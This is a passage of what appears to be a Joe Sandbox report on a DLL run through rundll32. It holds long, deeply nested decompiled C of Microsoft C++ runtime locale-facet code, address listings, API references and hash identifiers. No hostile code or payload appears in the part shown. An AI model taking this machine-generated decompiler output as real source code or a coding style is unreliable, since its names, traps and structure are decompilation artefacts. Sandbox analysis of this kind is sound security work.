																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E2066BA(_t594 - 0x14);
																																return E6E220075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E2114EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t594 - 0x20);
																																		E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t420, _t562, _t576, 0x14);
																																		E6E206653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e2c6dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1E161C(0x6e2c6d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E2066BA(_t594 - 0x14);
																																			return E6E220075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E211558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t594 - 0x20);
																																					E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t420, _t563, _t577, 0x14);
																																					E6E206653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e2c6e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1E161C(0x6e2c6dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E2066BA(_t594 - 0x14);
																																						return E6E220075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E2115C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t594 - 0x20);
																																								E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t420, _t564, _t578, 0x14);
																																								E6E206653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e2c6dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1E161C(0x6e2c6d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E2066BA(_t594 - 0x14);
																																									return E6E220075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E21162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1E1438(_t511);
																																											E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e26851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e26c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E21542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E220075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E206FD3(__eflags, _t565);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e2c6dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E206FD3(__eflags, _t564);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e2c6e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E206FD3(__eflags, _t563);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e2c6dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E206FD3(__eflags, _t562);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e2c6dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E206FD3(__eflags, _t561);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e2c6de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E206FD3(__eflags, _t560);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e2c6ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E206FD3(__eflags, _t559);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e2c6db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E206FD3(__eflags, _t558);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e2c6dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E206FD3(__eflags, _t557);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e2c6dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E206FD3(__eflags, _t556);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e2c6dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E206FD3(__eflags, _t555);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e2c6df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E206FD3(__eflags, _t554);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e2c6df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E206FD3(__eflags, _t553);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e2c6dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}













































                          0x6e20f4c1
                          0x6e20f4c1
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f2
                          0x6e20f4f7
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F4C8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F4D2
                          • int.LIBCPMT ref: 6E20F4E9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F523
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F543
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F561
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: tm,n
                          • API String ID: 651022567-372086613
                          • Opcode ID: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction ID: 3d7b4184a9cf290e8d376da37961dc493cf19a053d9752398efd262e1cf1dcd8
                          • Opcode Fuzzy Hash: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction Fuzzy Hash: 9411C67991091E9BCF01DBE4CC94AEEB77BBF44B18F240908E5106B2D0EFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t682 - 0x14, 0);
				_t651 =  *0x6e2c6dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1E161C(0x6e2c6d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E2066BA(_t682 - 0x14);
					return E6E220075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E210FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t682 - 0x20);
							E6E223D74(_t682 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t635, _t651, 0x14);
							E6E206653(_t682 - 0x14, 0);
							_t652 =  *0x6e2c6df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1E161C(0x6e2c6d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E2066BA(_t682 - 0x14);
								return E6E220075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E211057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t682 - 0x20);
										E6E223D74(_t682 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t482, _t636, _t652, 0x14);
										E6E206653(_t682 - 0x14, 0);
										_t653 =  *0x6e2c6dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1E161C(0x6e2c6d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E2066BA(_t682 - 0x14);
											return E6E220075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E2110BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t682 - 0x20);
													E6E223D74(_t682 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t482, _t637, _t653, 0x14);
													E6E206653(_t682 - 0x14, 0);
													_t654 =  *0x6e2c6df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1E161C(0x6e2c6da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E2066BA(_t682 - 0x14);
														return E6E220075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E211127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t682 - 0x20);
																E6E223D74(_t682 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t482, _t638, _t654, 0x14);
																E6E206653(_t682 - 0x14, 0);
																_t655 =  *0x6e2c6df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1E161C(0x6e2c6da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E2066BA(_t682 - 0x14);
																	return E6E220075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E2111AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t682 - 0x20);
																			E6E223D74(_t682 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t482, _t639, _t655, 0x14);
																			E6E206653(_t682 - 0x14, 0);
																			_t656 =  *0x6e2c6dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6E1E161C(0x6e2c6d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6E2066BA(_t682 - 0x14);
																				return E6E220075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6E211230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t682 - 0x20);
																						E6E223D74(_t682 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t482, _t640, _t656, 0x14);
																						E6E206653(_t682 - 0x14, 0);
																						_t657 =  *0x6e2c6dc4; // 0x0
